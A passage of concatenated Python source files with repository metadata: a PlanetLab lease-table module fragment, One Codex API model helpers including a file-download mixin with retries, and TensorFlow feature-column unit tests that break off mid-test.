        Round ``timestamp`` to the configured reservation granularity and
        return it as a validated UTC SQL string.
        """
        # convert to long
        timestamp = Timestamp.cast_long(timestamp)
        # retrieve configured granularity
        granularity = self.api.config.PLC_RESERVATION_GRANULARITY
        # the trick for rounding up rather than down
        if round_up:
            timestamp += (granularity-1)
        # round down
        timestamp = (timestamp // granularity) * granularity
        # return a SQL string
        return Timestamp.sql_validate_utc(timestamp)
    # round UP
    def validate_t_from(self, timestamp):
        """Validate a lease start time, rounding up to the granularity."""
        return self.validate_time(timestamp, round_up=True)
    # round DOWN
    def validate_t_until (self, timestamp):
        """Validate a lease end time, rounding down to the granularity."""
        return self.validate_time(timestamp, round_up=False)
class Leases(Table):
    """
    Representation of row(s) from the leases table in the
    database.
    """

    def __init__(self, api, lease_filter=None, columns=None):
        Table.__init__(self, api, Lease, columns)
        # Select from the view_leases view rather than the bare table.
        view = "view_leases"
        selected = ", ".join(list(self.columns.keys()))
        sql = "SELECT %s FROM %s WHERE true" % (selected, view)
        if lease_filter is not None:
            # Accept either (a collection of) lease id(s) or a filter dict.
            if isinstance(lease_filter, (list, tuple, set, int)):
                lease_filter = Filter(Lease.fields, {'lease_id': lease_filter})
            elif isinstance(lease_filter, dict):
                lease_filter = LeaseFilter(Lease.fields, lease_filter)
            else:
                raise PLCInvalidArgument("Wrong lease filter %r" % lease_filter)
            sql += " AND (%s) %s" % lease_filter.sql(api)
        self.selectall(sql)
| {
"content_hash": "b6a146cc1bd8ac9c03763e2f4137a515",
"timestamp": "",
"source": "github",
"line_count": 84,
"max_line_length": 90,
"avg_line_length": 34.476190476190474,
"alnum_prop": 0.6205110497237569,
"repo_name": "dreibh/planetlab-lxc-plcapi",
"id": "9da3d3b0f173c9929a46c77245fd62da9079aa3c",
"size": "3000",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "PLC/Leases.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Dockerfile",
"bytes": "724"
},
{
"name": "Makefile",
"bytes": "2995"
},
{
"name": "PHP",
"bytes": "574445"
},
{
"name": "PLpgSQL",
"bytes": "2764"
},
{
"name": "Perl",
"bytes": "1350"
},
{
"name": "Python",
"bytes": "871238"
},
{
"name": "Shell",
"bytes": "31392"
}
],
"symlink_target": ""
} |
import click
import inspect
import os
import requests
from onecodex.exceptions import OneCodexException, UnboundObject
def as_uri(uuid, base_class):
    """Return the full resource URI for ``uuid`` on ``base_class``.

    The schema URI carries a trailing ``#`` fragment marker, which is
    stripped before the instance id is appended.
    """
    return base_class._resource._schema._uri.rstrip("#") + "/" + uuid


def coerce_search_value(search_value, field_name, base_class):
    """Convert a user-supplied search value into its API wire format.

    ``$uri`` searches are rewritten to full resource URIs; model instances
    are converted to ``{"$ref": ...}`` references; any other value passes
    through unchanged.
    """
    if field_name == "$uri":
        # Bug fix: convert the *search value* (an instance id) to a URI.
        # Previously the literal field name "$uri" was converted, producing
        # ".../$uri" regardless of the value being searched for.
        return as_uri(search_value, base_class)

    # Deferred to avoid a circular import (and only needed on this path).
    from onecodex.models import OneCodexBase

    if isinstance(search_value, OneCodexBase):
        return {"$ref": search_value._resource._uri}
    return search_value
def check_bind(self_or_cls):
    """Raise `UnbondObject` unless ``self_or_cls`` carries an API binding
    (i.e. has a ``_resource`` attribute)."""
    if hasattr(self_or_cls, "_resource"):
        return
    kind = "class" if inspect.isclass(self_or_cls) else "instance"
    raise UnboundObject("This {} is not associated with an API binding.".format(kind))
def generate_potion_sort_clause(sort_items, sort_schema):
    """Translate sort field names into a Potion sort clause.

    A leading ``^`` on a field name requests descending order.  Raises
    `AttributeError` for fields not present in ``sort_schema``.
    """
    if sort_items is None:
        return {}
    if not isinstance(sort_items, list):
        sort_items = [sort_items]
    clause = {}
    for item in sort_items:
        if item.lstrip("^") not in sort_schema:
            raise AttributeError("Attribute {} can not be sorted on".format(item.lstrip("^")))
        descending = item.startswith("^")
        key = item[1:] if descending else item
        clause[key] = not descending
    return clause
def generate_potion_keyword_where(keyword_filters, where_schema, base_class):
    """Build a Potion ``where`` clause from keyword filters.

    ``id`` is aliased to ``$uri``; fields absent from ``where_schema``
    raise `AttributeError`.  Each value is coerced to wire format and
    wrapped in ``$containsall``/``$in`` depending on the operators the
    schema advertises for the field.
    """
    where = {}
    for field, value in keyword_filters.items():
        if field == "id":
            field = "$uri"
        if field not in where_schema:
            raise AttributeError(
                "{} can not be searched on {}".format(base_class.__name__, field)
            )
        # Collect the operators the schema allows for this field.
        required_lists = [v["required"] for v in where_schema[field]["anyOf"] if "required" in v]
        available_ops = [op for sublist in required_lists for op in sublist]
        # TODO: do schema type checking here too?
        if "$eq" not in available_ops and "$containsall" in available_ops:
            values = value if isinstance(value, list) else [value]
            where[field] = {
                "$containsall": [coerce_search_value(v, field, base_class) for v in values]
            }
        elif isinstance(value, list):
            where[field] = {
                "$in": [coerce_search_value(v, field, base_class) for v in value]
            }
        else:
            where[field] = coerce_search_value(value, field, base_class)
    return where
def truncate_string(s, length=24):
    """Truncate ``s`` for display, keeping the result at most ``length`` chars.

    Strings that already fit are returned unchanged.  Otherwise the string
    is cut to ``length - 3`` characters and an ellipsis appended (merged
    with a trailing "." of the truncated text when present).

    Bug fix: the previous cutoff (``len(s) < length - 3``) "truncated"
    strings of length ``length - 3 .. length`` into *longer* strings than
    the input; such strings are now returned as-is.
    """
    if len(s) <= length:
        return s
    s = s[: length - 3]
    if s.endswith("."):
        return s + ".."
    return s + "..."
class ResourceDownloadMixin(object):
    def download(self, path=None, file_obj=None, progressbar=False):
        """Download files from One Codex.

        Parameters
        ----------
        path : `string`, optional
            Full path to save the file to. If omitted, defaults to the original filename
            in the current working directory.
        file_obj : file-like object, optional
            Rather than save the file to a path, write it to this file-like object.
        progressbar : `bool`
            Display a progress bar using Click for the download?

        Returns
        -------
        `string`
            The path the file was downloaded to, if applicable. Otherwise, None.

        Notes
        -----
        If no arguments specified, defaults to download the file as the original filename
        in the current working directory. If `file_obj` given, will write data into the
        passed file-like object. If `path` given, will download the file to the path provided,
        but will not overwrite any existing files.
        """
        return self._download(
            "download_uri",
            self.filename,
            use_potion_session=False,
            path=path,
            file_obj=file_obj,
            progressbar=progressbar,
        )
    def _download(
        self,
        _resource_method,
        _filename=None,
        use_potion_session=False,
        path=None,
        file_obj=None,
        progressbar=False,
    ):
        """Shared download implementation.

        Calls ``_resource_method`` on the bound resource to obtain a
        download link, then streams the file to ``path`` or ``file_obj``
        (or to ``_filename`` in the current working directory when neither
        is given).  Raises `OneCodexException` on conflicting arguments,
        existing destination files, or HTTP failures.
        """
        from requests.adapters import HTTPAdapter
        from requests.packages.urllib3.util.retry import Retry
        # Samples still being processed have no file to fetch yet.
        if hasattr(self._resource, "visibility") and self._resource.visibility == "awaiting data":
            raise OneCodexException("Sample has not finished processing. Please try again later.")
        if path and file_obj:
            raise OneCodexException("Please specify only one of: path, file_obj")
        try:
            method_to_call = getattr(self._resource, _resource_method)
            download_link_info = method_to_call()
            # No explicit destination: derive a filename, falling back to
            # the server-suggested save_as_filename.
            if path is None and file_obj is None:
                if _filename is None:
                    if "save_as_filename" not in download_link_info:
                        raise OneCodexException(
                            "Please specify `path`, `file_obj`, or `_filename`."
                        )
                    _filename = download_link_info["save_as_filename"]
                path = os.path.join(os.getcwd(), _filename)
            # Never clobber an existing file.
            if path and os.path.exists(path):
                raise OneCodexException("{} already exists! Will not overwrite.".format(path))
            if use_potion_session:
                session = self._resource._client.session
            else:
                session = requests.Session()
            link = download_link_info["download_uri"]
            # Retry up to 5 times with backoff timing of 2s, 4s, 8s, 16s, and 32s (applies to all
            # HTTP methods). 404 is included for cases where the file is being asynchronously
            # uploaded to S3 and is expected to be available soon.
            # NOTE(review): ``method_whitelist`` was renamed ``allowed_methods``
            # in urllib3 1.26 and removed in 2.0 -- confirm the pinned urllib3
            # version before upgrading.
            retry_strategy = Retry(
                total=5,
                backoff_factor=2,
                status_forcelist=[404, 429, 500, 502, 503, 504],
                method_whitelist=False,
            )
            adapter = HTTPAdapter(max_retries=retry_strategy)
            session.mount("http://", adapter)
            session.mount("https://", adapter)
            resp = session.get(link, stream=True)
            # Stream in 1 KiB chunks to either the opened path or the
            # caller-provided file object.
            with (open(path, "wb") if path else file_obj) as f_out:
                if progressbar:
                    progress_label = os.path.basename(path) if path else self.filename
                    with click.progressbar(length=self.size, label=progress_label) as bar:
                        for data in resp.iter_content(chunk_size=1024):
                            bar.update(len(data))
                            f_out.write(data)
                else:
                    for data in resp.iter_content(chunk_size=1024):
                        f_out.write(data)
        except KeyboardInterrupt:
            # Remove the partial file before propagating the interrupt.
            if path:
                os.remove(path)
            raise
        except requests.exceptions.HTTPError as exc:
            # Translate HTTP failures into user-facing exceptions.
            if exc.response.status_code == 401:
                raise OneCodexException("You must be logged in to download files.")
            elif exc.response.status_code == 402:
                raise OneCodexException(
                    "You must either have a premium platform account or be in "
                    "a notebook environment to download files."
                )
            elif exc.response.status_code == 403:
                raise OneCodexException("You are not authorized to download this file.")
            else:
                raise OneCodexException(
                    "Download failed with an HTTP status code {}.".format(exc.response.status_code)
                )
        return path
| {
"content_hash": "a109a6b2f3526dbed4fa524b8fcbf9d4",
"timestamp": "",
"source": "github",
"line_count": 212,
"max_line_length": 99,
"avg_line_length": 37.00471698113208,
"alnum_prop": 0.5697896749521989,
"repo_name": "refgenomics/onecodex",
"id": "e2740d3f04d16f6560cb0b5dc5a3ad68e5d09f12",
"size": "7845",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "onecodex/models/helpers.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "33794"
},
{
"name": "Shell",
"bytes": "116"
}
],
"symlink_target": ""
} |
"""Tests for layers.feature_column_ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
from tensorflow.contrib.layers.python.layers import feature_column_ops
class TransformerTest(tf.test.TestCase):
  """Tests for feature_column_ops._Transformer.

  _Transformer lazily converts a FeatureColumn into a Tensor (or
  SparseTensor) using the supplied `features` dict, caching each result so
  repeated transforms of the same column do not add new graph ops.
  """

  def testRealValuedColumnIsIdentityTransformation(self):
    """A real-valued column passes its feature tensor through unchanged."""
    real_valued = tf.contrib.layers.real_valued_column("price")
    features = {"price": tf.constant([[20.], [110], [-3]])}
    output = feature_column_ops._Transformer(features).transform(real_valued)
    with self.test_session():
      self.assertAllEqual(output.eval(), [[20.], [110], [-3]])

  def testBucketizedColumn(self):
    """Bucketizing maps each value to the index of its boundary interval."""
    bucket = tf.contrib.layers.bucketized_column(
        tf.contrib.layers.real_valued_column("price"),
        boundaries=[0., 10., 100.])
    # buckets 2, 3, 0
    features = {"price": tf.constant([[20.], [110], [-3]])}
    output = feature_column_ops._Transformer(features).transform(bucket)
    with self.test_session():
      self.assertAllEqual(output.eval(), [[2], [3], [0]])

  def testBucketizedColumnWithMultiDimensions(self):
    """Bucketization applies element-wise to a multi-dimensional column."""
    bucket = tf.contrib.layers.bucketized_column(
        tf.contrib.layers.real_valued_column("price", 2),
        boundaries=[0., 10., 100.])
    # buckets 2, 3, 0
    features = {"price": tf.constant([[20., 110], [110., 20], [-3, -3]])}
    output = feature_column_ops._Transformer(features).transform(bucket)
    with self.test_session():
      self.assertAllEqual(output.eval(), [[2, 3], [3, 2], [0, 0]])

  def testCachedTransformation(self):
    """Transforming the same column twice must not add new graph ops."""
    bucket = tf.contrib.layers.bucketized_column(
        tf.contrib.layers.real_valued_column("price"),
        boundaries=[0., 10., 100.])
    # buckets 2, 3, 0
    features = {"price": tf.constant([[20.], [110], [-3]])}
    transformer = feature_column_ops._Transformer(features)
    with self.test_session() as sess:
      transformer.transform(bucket)
      num_of_ops = len(sess.graph.get_operations())
      # Verify that the second call to transform the same feature
      # doesn't increase the number of ops.
      transformer.transform(bucket)
      self.assertEqual(num_of_ops, len(sess.graph.get_operations()))

  def testSparseColumnWithHashBucket(self):
    """Hashed sparse column yields int64 ids in [0, bucket_size)."""
    hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket("wire", 10)
    wire_tensor = tf.SparseTensor(values=["omar", "stringer", "marlo"],
                                  indices=[[0, 0], [1, 0], [1, 1]],
                                  shape=[2, 2])
    features = {"wire": wire_tensor}
    output = feature_column_ops._Transformer(features).transform(hashed_sparse)
    with self.test_session():
      self.assertEqual(output.values.dtype, tf.int64)
      self.assertTrue(all(x < 10 and x >= 0 for x in output.values.eval()))
      # Sparse structure (indices/shape) is preserved; only values are hashed.
      self.assertAllEqual(output.indices.eval(), wire_tensor.indices.eval())
      self.assertAllEqual(output.shape.eval(), wire_tensor.shape.eval())

  def testEmbeddingColumn(self):
    """Transforming an embedding column equals transforming its sparse id
    column: the transformer produces ids, not the embedded dense tensor."""
    hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket("wire", 10)
    wire_tensor = tf.SparseTensor(values=["omar", "stringer", "marlo"],
                                  indices=[[0, 0], [1, 0], [1, 1]],
                                  shape=[2, 2])
    features = {"wire": wire_tensor}
    output = feature_column_ops._Transformer(features).transform(
        tf.contrib.layers.embedding_column(hashed_sparse, 10))
    expected = feature_column_ops._Transformer(features).transform(
        hashed_sparse)
    with self.test_session():
      self.assertAllEqual(output.values.eval(), expected.values.eval())
      self.assertAllEqual(output.indices.eval(), expected.indices.eval())
      self.assertAllEqual(output.shape.eval(), expected.shape.eval())

  def testSparseColumnWithKeys(self):
    """Keyed sparse column maps string values to their key indices."""
    keys_sparse = tf.contrib.layers.sparse_column_with_keys(
        "wire", ["marlo", "omar", "stringer"])
    wire_tensor = tf.SparseTensor(values=["omar", "stringer", "marlo"],
                                  indices=[[0, 0], [1, 0], [1, 1]],
                                  shape=[2, 2])
    features = {"wire": wire_tensor}
    output = feature_column_ops._Transformer(features).transform(keys_sparse)
    with self.test_session():
      # The key->id lookup table must be initialized before evaluation.
      tf.initialize_all_tables().run()
      self.assertEqual(output.values.dtype, tf.int64)
      # "omar"->1, "stringer"->2, "marlo"->0 per the keys list order.
      self.assertAllEqual(output.values.eval(), [1, 2, 0])
      self.assertAllEqual(output.indices.eval(), wire_tensor.indices.eval())
      self.assertAllEqual(output.shape.eval(), wire_tensor.shape.eval())

  def testSparseColumnWithHashBucket_IsIntegerized(self):
    """Integerized feature column buckets int values, keeping int32 dtype."""
    hashed_sparse = tf.contrib.layers.sparse_column_with_integerized_feature(
        "wire", 10)
    wire_tensor = tf.SparseTensor(values=[100, 1, 25],
                                  indices=[[0, 0], [1, 0], [1, 1]],
                                  shape=[2, 2])
    features = {"wire": wire_tensor}
    output = feature_column_ops._Transformer(features).transform(hashed_sparse)
    with self.test_session():
      self.assertEqual(output.values.dtype, tf.int32)
      self.assertTrue(all(x < 10 and x >= 0 for x in output.values.eval()))
      self.assertAllEqual(output.indices.eval(), wire_tensor.indices.eval())
      self.assertAllEqual(output.shape.eval(), wire_tensor.shape.eval())

  def testCrossColumn(self):
    """Crossing two sparse columns yields int64 ids in [0, hash_bucket_size)."""
    language = tf.contrib.layers.sparse_column_with_hash_bucket(
        "language", hash_bucket_size=3)
    country = tf.contrib.layers.sparse_column_with_hash_bucket(
        "country", hash_bucket_size=5)
    country_language = tf.contrib.layers.crossed_column(
        [language, country], hash_bucket_size=15)
    features = {
        "language": tf.SparseTensor(values=["english", "spanish"],
                                    indices=[[0, 0], [1, 0]],
                                    shape=[2, 1]),
        "country": tf.SparseTensor(values=["US", "SV"],
                                   indices=[[0, 0], [1, 0]],
                                   shape=[2, 1])
    }
    output = feature_column_ops._Transformer(features).transform(
        country_language)
    with self.test_session():
      self.assertEqual(output.values.dtype, tf.int64)
      self.assertTrue(all(x < 15 and x >= 0 for x in output.values.eval()))

  def testCrossWithBucketizedColumn(self):
    """A sparse column may be crossed with a bucketized real-valued column."""
    price_bucket = tf.contrib.layers.bucketized_column(
        tf.contrib.layers.real_valued_column("price"),
        boundaries=[0., 10., 100.])
    country = tf.contrib.layers.sparse_column_with_hash_bucket(
        "country", hash_bucket_size=5)
    country_price = tf.contrib.layers.crossed_column(
        [country, price_bucket], hash_bucket_size=15)
    features = {
        "price": tf.constant([[20.]]),
        "country": tf.SparseTensor(values=["US", "SV"],
                                   indices=[[0, 0], [0, 1]],
                                   shape=[1, 2])
    }
    output = feature_column_ops._Transformer(features).transform(country_price)
    with self.test_session():
      self.assertEqual(output.values.dtype, tf.int64)
      self.assertTrue(all(x < 15 and x >= 0 for x in output.values.eval()))

  def testCrossWithCrossedColumn(self):
    """A crossed column may itself be an input to another cross."""
    price_bucket = tf.contrib.layers.bucketized_column(
        tf.contrib.layers.real_valued_column("price"),
        boundaries=[0., 10., 100.])
    country = tf.contrib.layers.sparse_column_with_hash_bucket(
        "country", hash_bucket_size=5)
    country_price = tf.contrib.layers.crossed_column(
        [country, price_bucket], hash_bucket_size=15)
    wire = tf.contrib.layers.sparse_column_with_hash_bucket("wire", 10)
    wire_country_price = tf.contrib.layers.crossed_column(
        [wire, country_price], hash_bucket_size=15)
    features = {
        "price": tf.constant([[20.]]),
        "country": tf.SparseTensor(values=["US", "SV"],
                                   indices=[[0, 0], [0, 1]],
                                   shape=[1, 2]),
        "wire": tf.SparseTensor(values=["omar", "stringer", "marlo"],
                                indices=[[0, 0], [0, 1], [0, 2]],
                                shape=[1, 3])
    }
    output = feature_column_ops._Transformer(features).transform(
        wire_country_price)
    with self.test_session():
      self.assertEqual(output.values.dtype, tf.int64)
      self.assertTrue(all(x < 15 and x >= 0 for x in output.values.eval()))

  def testIfFeatureTableContainsTransfromationReturnIt(self):
    """If the features dict already maps the column to a value, that value is
    returned verbatim — it need not even be a Tensor."""
    any_column = tf.contrib.layers.sparse_column_with_hash_bucket("sparse", 10)
    features = {any_column: "any-thing-even-not-a-tensor"}
    output = feature_column_ops._Transformer(features).transform(any_column)
    self.assertEqual(output, "any-thing-even-not-a-tensor")
class InputLayerTest(tf.test.TestCase):
  """Tests for tf.contrib.layers.input_from_feature_columns.

  Covers dense construction from real-valued, bucketized and embedding
  columns, error behavior for columns that cannot be fed directly (plain
  sparse and crossed columns), and variable-collection bookkeeping.
  """

  def testRealValuedColumn(self):
    """A real-valued column is forwarded into the input layer unchanged."""
    real_valued = tf.contrib.layers.real_valued_column("price")
    features = {"price": tf.constant([[20.], [110], [-3]])}
    output = tf.contrib.layers.input_from_feature_columns(features,
                                                          [real_valued])
    with self.test_session():
      self.assertAllClose(output.eval(), features["price"].eval())

  def testRealValuedColumnWithMultiDimensions(self):
    """Multi-dimensional real-valued columns keep their full width."""
    real_valued = tf.contrib.layers.real_valued_column("price", 2)
    features = {"price": tf.constant([[20., 10.],
                                      [110, 0.],
                                      [-3, 30]])}
    output = tf.contrib.layers.input_from_feature_columns(features,
                                                          [real_valued])
    with self.test_session():
      self.assertAllClose(output.eval(), features["price"].eval())

  def testBucketizedColumn(self):
    """A bucketized column is one-hot encoded over its buckets."""
    bucket = tf.contrib.layers.bucketized_column(
        tf.contrib.layers.real_valued_column("price"),
        boundaries=[0., 10., 100.])
    # buckets 2, 3, 0
    features = {"price": tf.constant([[20.], [110], [-3]])}
    output = tf.contrib.layers.input_from_feature_columns(features, [bucket])
    expected = [[0, 0, 1, 0], [0, 0, 0, 1], [1, 0, 0, 0]]
    with self.test_session():
      self.assertAllClose(output.eval(), expected)

  def testBucketizedColumnWithMultiDimensions(self):
    """Each dimension of a bucketized column gets its own one-hot segment."""
    bucket = tf.contrib.layers.bucketized_column(
        tf.contrib.layers.real_valued_column("price", 2),
        boundaries=[0., 10., 100.])
    # buckets [2, 3], [3, 2], [0, 0]. dimension = 2
    features = {"price": tf.constant([[20., 200],
                                      [110, 50],
                                      [-3, -3]])}
    output = tf.contrib.layers.input_from_feature_columns(features, [bucket])
    expected = [[0, 0, 1, 0, 0, 0, 0, 1],
                [0, 0, 0, 1, 0, 0, 1, 0],
                [1, 0, 0, 0, 1, 0, 0, 0]]
    with self.test_session():
      self.assertAllClose(output.eval(), expected)

  def testEmbeddingColumn(self):
    """An embedding column produces a dense [batch, dimension] tensor."""
    hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket("wire", 10)
    wire_tensor = tf.SparseTensor(values=["omar", "stringer", "marlo"],
                                  indices=[[0, 0], [1, 0], [1, 1]],
                                  shape=[2, 2])
    features = {"wire": wire_tensor}
    embeded_sparse = tf.contrib.layers.embedding_column(hashed_sparse, 10)
    output = tf.contrib.layers.input_from_feature_columns(features,
                                                          [embeded_sparse])
    with self.test_session():
      tf.initialize_all_variables().run()
      self.assertAllEqual(output.eval().shape, [2, 10])

  def testEmbeddingColumnWithInitializer(self):
    """A custom initializer determines the embedding variable's values."""
    hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket("wire", 10)
    wire_tensor = tf.SparseTensor(values=["omar", "stringer", "marlo"],
                                  indices=[[0, 0], [1, 0], [1, 1]],
                                  shape=[2, 2])
    features = {"wire": wire_tensor}
    init_value = 133.7
    embeded_sparse = tf.contrib.layers.embedding_column(
        hashed_sparse,
        10, initializer=tf.constant_initializer(init_value))
    output = tf.contrib.layers.input_from_feature_columns(features,
                                                          [embeded_sparse])
    with self.test_session():
      tf.initialize_all_variables().run()
      output_eval = output.eval()
      self.assertAllEqual(output_eval.shape, [2, 10])
      # Constant initializer makes every output entry equal to init_value.
      self.assertAllClose(output_eval, np.tile(init_value, [2, 10]))

  def testEmbeddingColumnWithMultipleInitializers(self):
    """Two embedding columns over the same ids with different initializers
    must be rejected, since they would share one variable."""
    hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket("wire", 10)
    wire_tensor = tf.SparseTensor(values=["omar", "stringer", "marlo"],
                                  indices=[[0, 0], [1, 0], [1, 1]],
                                  shape=[2, 2])
    features = {"wire": wire_tensor}
    embedded_sparse = tf.contrib.layers.embedding_column(
        hashed_sparse,
        10,
        initializer=tf.truncated_normal_initializer(mean=42,
                                                    stddev=1337))
    embedded_sparse_alternate = tf.contrib.layers.embedding_column(
        hashed_sparse,
        10,
        initializer=tf.truncated_normal_initializer(mean=1337,
                                                    stddev=42))
    # Makes sure that trying to use different initializers with the same
    # embedding column explicitly fails.
    with self.assertRaises(ValueError):
      tf.contrib.layers.input_from_feature_columns(
          features, [embedded_sparse, embedded_sparse_alternate])

  def testSparseColumn(self):
    """A plain sparse column cannot feed the input layer directly."""
    hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket("wire", 10)
    wire_tensor = tf.SparseTensor(values=["omar", "stringer", "marlo"],
                                  indices=[[0, 0], [1, 0], [1, 1]],
                                  shape=[2, 2])
    features = {"wire": wire_tensor}
    # BUG FIX: the original placed `tf.initialize_all_variables().run()` as
    # the first statement inside assertRaises; with no default session that
    # call itself raises ValueError, so the assertion passed before the API
    # under test ever ran. It also called `input_layer`, which is not the
    # API exercised by the rest of this file. Only the call under test
    # belongs inside the assertRaises block.
    with self.assertRaises(ValueError):
      tf.contrib.layers.input_from_feature_columns(features, [hashed_sparse])

  def testCrossedColumn(self):
    """A crossed column cannot feed the input layer directly."""
    a = tf.contrib.layers.sparse_column_with_hash_bucket("aaa",
                                                         hash_bucket_size=100)
    b = tf.contrib.layers.sparse_column_with_hash_bucket("bbb",
                                                         hash_bucket_size=100)
    crossed = tf.contrib.layers.crossed_column(
        set([a, b]), hash_bucket_size=10000)
    wire_tensor = tf.SparseTensor(values=["omar", "stringer", "marlo"],
                                  indices=[[0, 0], [1, 0], [1, 1]],
                                  shape=[2, 2])
    features = {"aaa": wire_tensor, "bbb": wire_tensor}
    # BUG FIX: same spurious-pass problem as testSparseColumn — the stray
    # initialize_all_variables().run() raised ValueError on its own and the
    # `input_layer` call was never reached. Keep only the call under test.
    with self.assertRaises(ValueError):
      tf.contrib.layers.input_from_feature_columns(features, [crossed])

  def testAllColumns(self):
    """Mixed column types concatenate into one dense layer of total width."""
    real_valued = tf.contrib.layers.real_valued_column("income", 3)
    bucket = tf.contrib.layers.bucketized_column(
        tf.contrib.layers.real_valued_column("price", 2),
        boundaries=[0., 10., 100.])
    hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket("wire", 10)
    features = {
        "income": tf.constant([[20., 10, -5], [110, 0, -7], [-3, 30, 50]]),
        "price": tf.constant([[20., 200], [110, 2], [-20, -30]]),
        "wire": tf.SparseTensor(values=["omar", "stringer", "marlo"],
                                indices=[[0, 0], [1, 0], [2, 0]],
                                shape=[3, 1])
    }
    embeded_sparse = tf.contrib.layers.embedding_column(
        hashed_sparse,
        10, initializer=tf.constant_initializer(133.7))
    output = tf.contrib.layers.input_from_feature_columns(
        features, [real_valued, bucket, embeded_sparse])
    with self.test_session():
      tf.initialize_all_variables().run()
      # size of output = 3 (real_valued) + 2 * 4 (bucket) + 10 (embedding) = 21
      self.assertAllEqual(output.eval().shape, [3, 21])

  def testInputLayerWithCollections(self):
    """weight_collections receives exactly the variables the layer creates."""
    real_valued = tf.contrib.layers.real_valued_column("price")
    bucket = tf.contrib.layers.bucketized_column(real_valued,
                                                 boundaries=[0., 10., 100.])
    hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket("wire", 10)
    features = {
        "price": tf.constant([[20.], [110], [-3]]),
        "wire": tf.SparseTensor(values=["omar", "stringer", "marlo"],
                                indices=[[0, 0], [1, 0], [2, 0]],
                                shape=[3, 1])
    }
    embeded_sparse = tf.contrib.layers.embedding_column(hashed_sparse, 10)
    tf.contrib.layers.input_from_feature_columns(
        features, [real_valued, bucket, embeded_sparse],
        weight_collections=["my_collection"])
    weights = tf.get_collection("my_collection")
    # one variable for embeded sparse
    self.assertEqual(1, len(weights))

  def testInputLayerWithTrainableArg(self):
    """trainable=False keeps the embedding variable out of TRAINABLE_VARIABLES;
    trainable=True puts it in."""
    real_valued = tf.contrib.layers.real_valued_column("price")
    bucket = tf.contrib.layers.bucketized_column(real_valued,
                                                 boundaries=[0., 10., 100.])
    hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket("wire", 10)
    features = {
        "price": tf.constant([[20.], [110], [-3]]),
        "wire": tf.SparseTensor(values=["omar", "stringer", "marlo"],
                                indices=[[0, 0], [1, 0], [2, 0]],
                                shape=[3, 1])
    }
    embeded_sparse = tf.contrib.layers.embedding_column(hashed_sparse, 10)
    tf.contrib.layers.input_from_feature_columns(
        features, [real_valued, bucket, embeded_sparse],
        weight_collections=["my_collection"],
        trainable=False)
    # There should not be any trainable variables
    self.assertEqual(0, len(tf.trainable_variables()))
    tf.contrib.layers.input_from_feature_columns(
        features, [real_valued, bucket, embeded_sparse],
        weight_collections=["my_collection"],
        trainable=True)
    # There should one trainable variable for embeded sparse
    self.assertEqual(1, len(tf.trainable_variables()))
class WeightedSumTest(tf.test.TestCase):
def testSparseColumn(self):
hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket("wire", 10)
wire_tensor = tf.SparseTensor(values=["omar", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[2, 2])
features = {"wire": wire_tensor}
logits, _, _ = tf.contrib.layers.weighted_sum_from_feature_columns(
features, [hashed_sparse], num_outputs=5)
with self.test_session():
tf.initialize_all_variables().run()
self.assertAllEqual(logits.eval().shape, [2, 5])
def testCrossedColumn(self):
a = tf.contrib.layers.sparse_column_with_hash_bucket("aaa",
hash_bucket_size=100)
b = tf.contrib.layers.sparse_column_with_hash_bucket("bbb",
hash_bucket_size=100)
crossed = tf.contrib.layers.crossed_column(
set([a, b]), hash_bucket_size=10000)
wire_tensor = tf.SparseTensor(values=["omar", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[2, 2])
features = {"aaa": wire_tensor, "bbb": wire_tensor}
logits, _, _ = tf.contrib.layers.weighted_sum_from_feature_columns(
features, [crossed], num_outputs=5)
with self.test_session():
tf.initialize_all_variables().run()
self.assertAllEqual(logits.eval().shape, [2, 5])
def testEmbeddingColumn(self):
hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket("wire", 10)
wire_tensor = tf.SparseTensor(values=["omar", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[2, 2])
features = {"wire": wire_tensor}
embeded_sparse = tf.contrib.layers.embedding_column(hashed_sparse, 10)
with self.assertRaises(ValueError):
tf.initialize_all_variables().run()
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[embeded_sparse])
def testRealValuedColumnWithMultiDimensions(self):
real_valued = tf.contrib.layers.real_valued_column("price", 2)
features = {"price": tf.constant([[20., 10.], [110, 0.], [-3, 30]])}
logits, _, _ = tf.contrib.layers.weighted_sum_from_feature_columns(
features, [real_valued], num_outputs=5)
with self.test_session():
tf.initialize_all_variables().run()
self.assertAllEqual(logits.eval().shape, [3, 5])
def testBucketizedColumnWithMultiDimensions(self):
bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price", 2),
boundaries=[0., 10., 100.])
features = {"price": tf.constant([[20., 10.], [110, 0.], [-3, 30]])}
logits, _, _ = tf.contrib.layers.weighted_sum_from_feature_columns(
features, [bucket], num_outputs=5)
with self.test_session():
tf.initialize_all_variables().run()
self.assertAllEqual(logits.eval().shape, [3, 5])
def testAllColumns(self):
real_valued = tf.contrib.layers.real_valued_column("income", 2)
bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price"),
boundaries=[0., 10., 100.])
hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket("wire", 10)
crossed = tf.contrib.layers.crossed_column([bucket, hashed_sparse], 100)
features = {
"income": tf.constant([[20., 10], [110, 0], [-3, 30]]),
"price": tf.constant([[20.], [110], [-3]]),
"wire": tf.SparseTensor(values=["omar", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [2, 0]],
shape=[3, 1])
}
